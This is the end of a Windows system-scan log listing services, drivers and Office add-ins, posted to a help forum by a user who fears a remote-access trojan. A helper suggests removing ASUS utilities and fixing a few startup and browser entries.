O23 - Service R2: Logitech LampArray Service - (logi_lamparray_service) - C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe (sign: 'Logitech Inc')
O23 - Service R2: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (sign: 'Malwarebytes Inc.') (+safe mode)
O23 - Service R2: Microsoft Defender Core Service - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpDefenderCoreService.exe (sign: 'Microsoft')
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem /ert (sign: 'NVIDIA Corporation')
O23 - Service R2: NVIDIA LocalSystem Container - (NvContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -s NvContainerLocalSystem -a -f "C:\ProgramData\NVIDIA Corporation\NVIDIA app\NvContainer\NvContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem" -r -p 30000 -ert (sign: 'NVIDIA Corporation')
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_55047240f73a1fa6\RtkAudUService64.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service R2: ROG Live Service - C:\Program Files\ASUS\ROG Live Service\ROGLiveService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Thunderbolt(TM) Application Launcher - (TbtHostControllerService) - C:\WINDOWS\ThunderboltService.exe (sign: 'Intel Corporation')
O23 - Service R2: Thunderbolt(TM) Peer to Peer Shortcut - (TbtP2pShortcutService) - C:\WINDOWS\TbtP2pShortcutService.exe (sign: 'Intel Corporation')
O23 - Service R3: ESET Firewall Helper - (ekrnEpfw) - C:\Program Files\ESET\ESET Security\ekrn.exe (sign: 'ESET, spol. s r.o.')
O23 - Service R3: Intel® PROSet/Wireless Service - (PIEServiceNew) - C:\WINDOWS\System32\DriverStore\FileRepository\piecomponent.inf_amd64_ee1169deb7ec6a42\Intel_PIE_Service.exe (sign: 'Intel Corporation')
O23 - Service R3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService (sign: 'Valve Corp.')
O23 - Service S2: ASUS Güncelleme Hizmeti (asus) - (asus) - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /svc (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service S2: AsusROGLSLService Download ROGLSLoader - (AsusROGLSLService) - C:\Program Files (x86)\ASUS\AsusROGLSLService\AsusROGLSLService.exe -runservice (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service S2: Google Güncelleyici Dahili Hizmeti (GoogleUpdaterInternalService135.0.7023.0) - (GoogleUpdaterInternalService135.0.7023.0) - C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe --system --windows-service --service=update-internal (sign: 'Google LLC')
O23 - Service S2: Google Güncelleyici Hizmeti (GoogleUpdaterService135.0.7023.0) - (GoogleUpdaterService135.0.7023.0) - C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe --system --windows-service --service=update (sign: 'Google LLC')
O23 - Service S2: Intel(R) Platform License Manager Service - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_fc84dfa25a6a7727\lib\PlatformLicenseManagerService.exe (sign: 'Intel Corporation')
O23 - Service S3: ASUS Güncelleme Hizmeti (asusm) - (asusm) - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /medsvc (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe (sign: 'BattlEye Innovations e.K.')
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe (sign: 'EasyAntiCheat Oy')
O23 - Service S3: Epic Games Updater - (EpicGamesUpdater) - C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesUpdater.exe (sign: 'Epic Games Inc.')
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe (sign: 'Epic Games Inc.')
O23 - Service S3: Gameforge Client Service - (GameforgeClientService) - C:\Program Files (x86)\GameforgeClient\gfservice.exe (sign: 'Gameforge 4D GmbH')
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\134.0.6998.89\elevation_service.exe (sign: 'Google LLC')
O23 - Service S3: Kaspersky Volume Shadow Copy Service Bridge 21.20 - (klvssbridge64_21.20) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\x64\vssbridge64.exe (sign: 'AO Kaspersky Lab')
O23 - Service S3: MBVpnTunnelService - C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe (sign: 'Malwarebytes Inc.')
O23 - Service S3: NVIDIA FrameView SDK service - (FvSvc) - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe -service (sign: 'NVIDIA Corporation')
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe (sign: 'Rockstar Games, Inc.')
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe (sign: 'Riot Games, Inc.')
O23 - Driver R: Antistealth module - C:\Program Files\ESET\ESET Security\Modules\em006_64\1252\em006_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R: Epfw module - C:\Program Files\ESET\ESET Security\Modules\em008k_64\1641\00\em008k_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R: HIPS module - C:\Program Files\ESET\ESET Security\Modules\em018k_64\1904\em018k_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R: Loader module - C:\Program Files\ESET\ESET Security\Modules\em000k_64\1024\em000k_64.dll (sign: 'ESET, spol. s r.o.')
O23 - Driver R: Network protection module - C:\Program Files\ESET\ESET Security\Modules\em042_64\2337\00\em042_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R0: AO Kaspersky Lab Cryptographic Module x64 (56 bit) - (cm_km) - C:\WINDOWS\system32\DRIVERS\cm_km.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R0: klupd_K4W-21-20_arkmon - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_arkmon.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R0: klupd_K4W-21-20_klbg - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_klbg.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Asusgio3 - C:\WINDOWS\system32\drivers\AsIO3.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R1: ATKWMIACPI Driver - (ATKWMIACPIIO) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusWmiAcpi.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R1: eamonm - C:\WINDOWS\system32\DRIVERS\eamonm.sys (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: ehdrv - C:\WINDOWS\system32\DRIVERS\ehdrv.sys (+safe mode) (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: epfw - C:\WINDOWS\system32\DRIVERS\epfw.sys (+safe mode) (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: epfwwfp - C:\WINDOWS\system32\DRIVERS\epfwwfp.sys (+safe mode) (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: Kaspersky Anti-Virus NDIS 6 Filter - (klim6) - C:\WINDOWS\system32\DRIVERS\klim6.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab Driver.K4W-21-20 - (KLIF.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klif.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab format recognizer driver.K4W-21-20 - (klpd.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klpd.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab Kernel DLL.K4W-21-20 - (klflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab klbackupdisk.K4W-21-20 - (klbackupdisk.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klbackupdisk.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab klbackupflt.K4W-21-20 - (klbackupflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klbackupflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab KLKBDFLT.K4W-21-20 - (klkbdflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klkbdflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab klpnpflt.K4W-21-20 - (klpnpflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klpnpflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab Security Extender Driver.K4W-21-20 - (klgse.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klgse.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab service driver.K4W-21-20 - (klhk.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klhk.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: kldisk.K4W-21-20 - C:\WINDOWS\system32\DRIVERS\K4W-21-20\kldisk.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: klwtp.K4W-21-20 - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klwtp.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: kneps.K4W-21-20 - C:\WINDOWS\system32\DRIVERS\K4W-21-20\kneps.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: vgk - C:\Program Files\Riot Vanguard\vgk.sys (sign: 'Riot Games, Inc.')
O23 - Driver R2: MBAMChameleon - (mbamchameleon) - C:\WINDOWS\System32\Drivers\MbamChameleon.sys (sign: 'Microsoft' - Malwarebytes)
O23 - Driver R3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü - (Netwtw14) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_8231e64986f91750\Netwtw14.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ASUS Precision Touch Service - (AsusPTPDrv) - C:\WINDOWS\System32\DriverStore\FileRepository\asusptpfilter.inf_amd64_1e467870260bcd2f\AsusPTPFilter.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R3: AsusSAIO - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSAIO.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R3: Cirrus Amp Driver - (csaudio) - C:\WINDOWS\System32\DriverStore\FileRepository\csaudio.inf_amd64_59f367136e2268c9\csaudio.sys (sign: 'Microsoft' - Windows (R) Win 7 DDK provider)
O23 - Driver R3: igfxn - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_ffe7d9986336312b\igdkmdn64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) GNA Scoring Accelerator service - (IntelGNA) - C:\WINDOWS\System32\DriverStore\FileRepository\gna.inf_amd64_04d4eecc5838a558\gna.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Management Engine Interface - (MEIx64) - C:\WINDOWS\System32\DriverStore\FileRepository\heci.inf_amd64_6467379f0b0f181f\x64\TeeDriverW10x64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO GPIO Driver v2 - (iaLPSS2_GPIO2_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_302e75596cffa74a\iaLPSS2_GPIO2_ADL.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO I2C Driver v2 - (iaLPSS2_I2C_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_e736c048ca307ed2\iaLPSS2_I2C_ADL.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO SPI Driver v2 - (iaLPSS2_SPI_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_spi_adl.inf_amd64_334c460fea9b11a4\iaLPSS2_SPI_ADL.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Wireless Bluetooth(R) - (ibtusb) - C:\WINDOWS\System32\DriverStore\FileRepository\ibtusb.inf_amd64_16f57b72ff14f3e7\ibtusb.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology BUS - (IntcAudioBus) - C:\WINDOWS\System32\DriverStore\FileRepository\intcaudiobus.inf_amd64_799c962c58e6bfeb\IntcAudioBus.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® Audio - (IntcBTAu) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtau.inf_amd64_164a440e6b400316\IntcBTAu.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® LE Audio - (IntcBtLE) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtle.inf_amd64_0c9aadaff32d0209\IntcBtLE.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for USB Audio - (IntcUSB) - C:\WINDOWS\System32\DriverStore\FileRepository\intcusb.inf_amd64_c2a06a639869c7cd\IntcUSB.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology OED - (IntcOED) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\IntcOED.sys (sign: 'Intel Corporation')
O23 - Driver R3: ipf_acpi - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_acpi.inf_amd64_2c4217605fff2443\ipf_acpi.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_cpu - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_cpu.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_lf - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_lf.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Kaspersky Lab KLMOUFLT.K4W-21-20 - (klmouflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klmouflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: klids.K4W-21-20 - C:\ProgramData\Kaspersky Lab\AVP21.20\Bases\klids.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: klupd_K4W-21-20_klark - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_klark.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: klupd_K4W-21-20_mark - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_mark.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R3: Logitech G HUB Translation Layer Driver - (logi_joy_xlcore) - C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys (sign: 'Logitech Inc')
O23 - Driver R3: Logitech G HUB Virtual Bus Enumerator Driver - (logi_joy_bus_enum) - C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys (sign: 'Logitech Inc')
O23 - Driver R3: Logitech G HUB Virtual HID Device Driver - (logi_joy_vir_hid) - C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys (sign: 'Logitech Inc')
O23 - Driver R3: Logitech LampArray Device Driver - (logi_lamparray) - C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray.sys (sign: 'Logitech Inc')
O23 - Driver R3: MBAMSwissArmy - C:\WINDOWS\System32\Drivers\mbamswissarmy.sys (sign: 'Microsoft' - Malwarebytes)
O23 - Driver R3: NVIDIA Virtual Audio Device (Wave Extensible) (WDM) - (nvvad_WaveExtensible) - C:\WINDOWS\system32\drivers\nvvad64v.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: nvlddmkm - C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\nvlddmkm.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: NVPCF Service - (nvpcf) - C:\WINDOWS\System32\drivers\nvpcf.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Realtek RT640 NT Driver - (rt640x64) - C:\WINDOWS\System32\drivers\rt640x64.sys (+safe mode) (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Service for NVIDIA High Definition Audio Driver - (NVHDA) - C:\WINDOWS\system32\drivers\nvhda64v.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Service for Realtek HD Audio (WDM) - (IntcAzAudAddService) - C:\WINDOWS\system32\drivers\RTKVHD64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Thunderbolt(TM) Controller - (nhi) - C:\WINDOWS\System32\drivers\TbtBusDrv.sys (sign: 'Intel Corporation')
O23 - Driver S0: WinSetupMon - C:\WINDOWS\system32\DRIVERS\WinSetupMon.sys (file missing)
O23 - Driver S1: AMSDK Driver - (amsdk) - C:\WINDOWS\system32\drivers\amsdk.sys (sign: 'Zemana D.O.O. Sarajevo')
O23 - Driver S3: Intel(R) Serial IO GPIO Controller Driver - (iaLPSSi_GPIO) - C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys (sign: 'Intel Corporation - Client Components Group')
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'epfwwfp'.
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'klim6'.
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'klwtp.K4W-21-20'
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'Netwtw14'.
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'rt640x64'.
O26 - Office Addin: HKLM\..\ESET.OutlookAddin - (ESET Outlook Add-in) -> C:\Program Files\ESET\ESET Security\eplgOutlook.dll (sign: 'ESET, spol. s r.o.')
O26 - Office Addin: HKLM\..\OutlookKLAvPlg.Addin_D4D8A8A7-C191-40BB-9E4E-623874AD191D - (Kaspersky4Win Outlook Anti-Virus Addin) -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\x64\mcou.dll (sign: 'AO Kaspersky Lab')
O26-32 - Office Addin: HKLM\..\ESET.OutlookAddin - (ESET Outlook Add-in) -> C:\Program Files\ESET\ESET Security\x86\eplgOutlook.dll (sign: 'ESET, spol. s r.o.')
O26-32 - Office Addin: HKLM\..\OutlookKLAvPlg.Addin_D4D8A8A7-C191-40BB-9E4E-623874AD191D - (Kaspersky4Win Outlook Anti-Virus Addin) -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\mcou.dll (sign: 'AO Kaspersky Lab')

--
End of file - Time spent: 27,1 sec. - 90444 bytes, CRC32: FFFFFFFF. Sign: ⁥ō

I've posted the log, could you help? I got hit by a RAT.
 
ESET and Kaspersky are both installed! They would have detected it if there were one.
Uninstall the ASUS tools, the unnecessary ones.

Fix these:
Code:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = hxxp://vvv.joygame.com/games.aspx?g=2001
O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\134.0.6998.89\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\Run: [MicrosoftEdgeAutoLaunch_E3D834145B9E086748646FF8637E21CC] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start (sign: 'Microsoft')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O22 - BITS Job: (download) {35B8E922-B052-4E37-A7F9-E8F4EDFD7994} - hxxps://oneclient.sfx.ms/Win/Installers/25.015.0126.0002/amd64/OneDriveSetup.exe -> C:\Users\eymen\AppData\Local\Temp\wct6522.tmp
 
How do I fix these?
 
